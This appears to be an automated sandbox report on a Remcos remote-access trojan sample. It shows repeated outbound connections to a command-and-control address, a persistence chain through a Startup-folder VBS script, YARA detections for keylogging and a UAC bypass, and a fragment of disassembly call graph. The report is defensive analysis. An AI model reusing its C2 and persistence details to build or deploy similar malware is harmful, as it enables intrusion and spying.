                                            Jan 10, 2025 23:04:07.477945089 CET367850102192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:07.478080034 CET501023678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:07.478773117 CET501023678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:07.483586073 CET367850102192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:08.888150930 CET367850102192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:08.888329029 CET501023678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:08.888329029 CET501023678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:08.893198013 CET367850102192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:08.972477913 CET501033678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:08.977294922 CET367850103192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:08.977379084 CET501033678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:08.977664948 CET501033678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:08.982470989 CET367850103192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:10.369810104 CET367850103192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:10.370498896 CET501033678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:10.370882988 CET501033678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:10.375688076 CET367850103192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:10.441268921 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:10.446264029 CET367850104192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:10.446536064 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:10.447011948 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:10.451901913 CET367850104192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.854808092 CET367850104192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.854883909 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.854963064 CET501043678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.859714985 CET367850104192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.925708055 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.930535078 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:11.930619955 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.930881977 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:11.935630083 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.323457003 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.323534966 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.323615074 CET501053678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.328412056 CET367850105192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.394952059 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.400053978 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:13.400126934 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.400547981 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:13.405307055 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.810117960 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.810211897 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.810211897 CET501063678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.815042019 CET367850106192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.878952026 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.883972883 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:14.884063005 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.884448051 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:14.889241934 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.299868107 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.299952984 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.300002098 CET501073678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.304878950 CET367850107192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.363368034 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.368458986 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:16.368555069 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.369009972 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:16.373898983 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.784466982 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.786539078 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.786539078 CET501083678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.791369915 CET367850108192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.847520113 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.852427959 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:17.854501963 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.854765892 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:17.859561920 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:19.324090958 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:19.324198008 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:19.324198008 CET501093678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:19.329117060 CET367850109192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:19.394553900 CET501103678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:19.399558067 CET367850110192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:19.399648905 CET501103678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:19.400122881 CET501103678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:19.404923916 CET367850110192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:20.827893019 CET367850110192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:20.830543995 CET501103678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:20.830595970 CET501103678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:20.835522890 CET367850110192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:20.894578934 CET501113678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:20.899565935 CET367850111192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:20.902515888 CET501113678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:20.902761936 CET501113678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:20.907613993 CET367850111192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:22.312163115 CET367850111192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:22.312225103 CET501113678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:22.312266111 CET501113678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:22.317037106 CET367850111192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:22.378875017 CET501123678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:22.383919001 CET367850112192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:22.384005070 CET501123678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:22.384248972 CET501123678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:22.389084101 CET367850112192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:23.792597055 CET367850112192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:23.794529915 CET501123678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:23.794550896 CET501123678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:23.799380064 CET367850112192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:23.848098993 CET501133678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:23.852987051 CET367850113192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:23.853080034 CET501133678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:23.853477001 CET501133678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:23.858275890 CET367850113192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:25.264827967 CET367850113192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:25.264955997 CET501133678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:25.264997005 CET501133678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:25.269809961 CET367850113192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:25.316529036 CET501143678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:25.321443081 CET367850114192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:25.321556091 CET501143678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:25.321960926 CET501143678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:25.326740980 CET367850114192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:26.734154940 CET367850114192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:26.734586000 CET501143678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:26.734635115 CET501143678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:26.739523888 CET367850114192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:26.785032034 CET501153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:26.790127993 CET367850115192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:26.790227890 CET501153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:26.790483952 CET501153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:26.795452118 CET367850115192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:28.199307919 CET367850115192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:28.199399948 CET501153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:28.199450016 CET501153678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:28.204312086 CET367850115192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:28.253923893 CET501163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:28.258928061 CET367850116192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:28.259031057 CET501163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:28.259263992 CET501163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:28.264086008 CET367850116192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:29.711582899 CET367850116192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:29.712572098 CET501163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:29.723038912 CET501163678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:29.727935076 CET367850116192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:29.770653963 CET501173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:29.775495052 CET367850117192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:29.775569916 CET501173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:29.776043892 CET501173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:29.780792952 CET367850117192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:31.243272066 CET367850117192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:31.243454933 CET501173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:31.243546963 CET501173678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:31.248311996 CET367850117192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:31.300705910 CET501183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:31.305598021 CET367850118192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:31.305671930 CET501183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:31.305922031 CET501183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:31.310760975 CET367850118192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:32.717372894 CET367850118192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:32.717489958 CET501183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:33.053091049 CET501183678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:33.058099031 CET367850118192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:34.066535950 CET501193678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:34.071701050 CET367850119192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:34.071870089 CET501193678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:34.072096109 CET501193678192.168.2.6192.210.150.26
                                            Jan 10, 2025 23:04:34.076927900 CET367850119192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:35.687808037 CET367850119192.210.150.26192.168.2.6
                                            Jan 10, 2025 23:04:35.687886953 CET501193678192.168.2.6192.210.150.26

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:17:00:26
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\l1QC9H0SNR.exe"
                                            Imagebase:0xb50000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:17:00:27
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\l1QC9H0SNR.exe"
                                            Imagebase:0x6c0000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 75%, ReversingLabs
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:3
                                            Start time:17:00:40
                                            Start date:10/01/2025
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs"
                                            Imagebase:0x7ff6948c0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:17:00:40
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
                                            Imagebase:0x6c0000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:17:00:41
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
                                            Imagebase:0x6c0000
                                            File size:921'600 bytes
                                            MD5 hash:BE20DFFFCBA37064D6087AA714036873
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.4%
                                              Dynamic/Decrypted Code Coverage:0.4%
                                              Signature Coverage:8.3%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:179
                                              execution_graph 104526 b51055 104531 b52649 104526->104531 104541 b57667 104531->104541 104536 b52754 104537 b5105a 104536->104537 104549 b53416 59 API calls 2 library calls 104536->104549 104538 b72d40 104537->104538 104595 b72c44 104538->104595 104540 b51064 104550 b70db6 104541->104550 104543 b57688 104544 b70db6 Mailbox 59 API calls 104543->104544 104545 b526b7 104544->104545 104546 b53582 104545->104546 104588 b535b0 104546->104588 104549->104536 104552 b70dbe 104550->104552 104553 b70dd8 104552->104553 104555 b70ddc std::exception::exception 104552->104555 104560 b7571c 104552->104560 104577 b733a1 RtlDecodePointer 104552->104577 104553->104543 104578 b7859b RaiseException 104555->104578 104557 b70e06 104579 b784d1 58 API calls _free 104557->104579 104559 b70e18 104559->104543 104561 b75797 104560->104561 104565 b75728 104560->104565 104586 b733a1 RtlDecodePointer 104561->104586 104563 b7579d 104587 b78b28 58 API calls __getptd_noexit 104563->104587 104564 b75733 104564->104565 104580 b7a16b 58 API calls __NMSG_WRITE 104564->104580 104581 b7a1c8 58 API calls 5 library calls 104564->104581 104582 b7309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104564->104582 104565->104564 104568 b7575b RtlAllocateHeap 104565->104568 104571 b75783 104565->104571 104575 b75781 104565->104575 104583 b733a1 RtlDecodePointer 104565->104583 104568->104565 104569 b7578f 104568->104569 104569->104552 104584 b78b28 58 API calls __getptd_noexit 104571->104584 104585 b78b28 58 API calls __getptd_noexit 104575->104585 104577->104552 104578->104557 104579->104559 104580->104564 104581->104564 104583->104565 104584->104575 104585->104569 104586->104563 104587->104569 104589 b535bd 104588->104589 104590 b535a1 104588->104590 104589->104590 104591 b535c4 RegOpenKeyExW 104589->104591 104590->104536 104591->104590 104592 b535de RegQueryValueExW 104591->104592 104593 b53614 RegCloseKey 104592->104593 104594 b535ff 104592->104594 104593->104590 104594->104593 104596 b72c50 __initptd 104595->104596 104603 b73217 104596->104603 104602 b72c77 __initptd 104602->104540 104620 b79c0b 104603->104620 104605 b72c59 104606 b72c88 RtlDecodePointer RtlDecodePointer 104605->104606 104607 b72c65 104606->104607 104608 b72cb5 104606->104608 104617 b72c82 104607->104617 104608->104607 104666 b787a4 59 API calls __mbschr_l 104608->104666 104610 b72d18 RtlEncodePointer RtlEncodePointer 104610->104607 104611 b72cc7 104611->104610 104612 b72cec 104611->104612 104667 b78864 61 API calls 2 library calls 104611->104667 104612->104607 104615 b72d06 RtlEncodePointer 104612->104615 104668 b78864 61 API calls 2 library calls 104612->104668 104615->104610 104616 b72d00 104616->104607 104616->104615 104669 b73220 104617->104669 104621 b79c2f RtlEnterCriticalSection 104620->104621 104622 b79c1c 104620->104622 104621->104605 104627 b79c93 104622->104627 104624 b79c22 104624->104621 104651 b730b5 58 API calls 3 library calls 104624->104651 104628 b79c9f __initptd 104627->104628 104629 b79cc0 104628->104629 104630 b79ca8 104628->104630 104635 b79ce1 __initptd 104629->104635 104655 b7881d 58 API calls 2 library calls 104629->104655 104652 b7a16b 58 API calls __NMSG_WRITE 104630->104652 104633 b79cad 104653 b7a1c8 58 API calls 5 library calls 104633->104653 104634 b79cd5 104637 b79cdc 104634->104637 104638 b79ceb 104634->104638 104635->104624 104656 b78b28 58 API calls __getptd_noexit 104637->104656 104641 b79c0b __lock 58 API calls 104638->104641 104639 b79cb4 104654 b7309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104639->104654 104643 b79cf2 104641->104643 104645 b79d17 104643->104645 104646 b79cff 104643->104646 104658 b72d55 104645->104658 104657 b79e2b InitializeCriticalSectionAndSpinCount 104646->104657 104649 b79d0b 104664 b79d33 RtlLeaveCriticalSection _doexit 104649->104664 104652->104633 104653->104639 104655->104634 104656->104635 104657->104649 104659 b72d5e RtlFreeHeap 104658->104659 104660 b72d87 __dosmaperr 104658->104660 104659->104660 104661 b72d73 104659->104661 104660->104649 104665 b78b28 58 API calls __getptd_noexit 104661->104665 104663 b72d79 GetLastError 104663->104660 104664->104635 104665->104663 104666->104611 104667->104612 104668->104616 104672 b79d75 RtlLeaveCriticalSection 104669->104672 104671 b72c87 104671->104602 104672->104671 104673 1009a60 104687 1007680 104673->104687 104675 1009aff 104690 1009950 104675->104690 104693 100ab40 GetPEB 104687->104693 104689 1007d0b 104689->104675 104691 1009959 Sleep 104690->104691 104692 1009967 104691->104692 104694 100ab6a 104693->104694 104694->104689 104695 b77c56 104696 b77c62 __initptd 104695->104696 104732 b79e08 GetStartupInfoW 104696->104732 104698 b77c67 104734 b78b7c GetProcessHeap 104698->104734 104700 b77cbf 104701 b77cca 104700->104701 104817 b77da6 58 API calls 3 library calls 104700->104817 104735 b79ae6 104701->104735 104704 b77cd0 104705 b77cdb __RTC_Initialize 104704->104705 104818 b77da6 58 API calls 3 library calls 104704->104818 104756 b7d5d2 104705->104756 104708 b77cea 104709 b77cf6 GetCommandLineW 104708->104709 104819 b77da6 58 API calls 3 library calls 104708->104819 104775 b84f23 GetEnvironmentStringsW 104709->104775 104712 b77cf5 104712->104709 104715 b77d10 104716 b77d1b 104715->104716 104820 b730b5 58 API calls 3 library calls 104715->104820 104785 b84d58 104716->104785 104719 b77d21 104720 b77d2c 104719->104720 104821 b730b5 58 API calls 3 library calls 104719->104821 104799 b730ef 104720->104799 104723 b77d34 104724 b77d3f __wwincmdln 104723->104724 104822 b730b5 58 API calls 3 library calls 104723->104822 104805 b547d0 104724->104805 104727 b77d53 104728 b77d62 104727->104728 104823 b73358 58 API calls _doexit 104727->104823 104824 b730e0 58 API calls _doexit 104728->104824 104731 b77d67 __initptd 104733 b79e1e 104732->104733 104733->104698 104734->104700 104825 b73187 36 API calls 2 library calls 104735->104825 104737 b79aeb 104826 b79d3c InitializeCriticalSectionAndSpinCount __mtinitlocknum 104737->104826 104739 b79af0 104740 b79af4 104739->104740 104828 b79d8a TlsAlloc 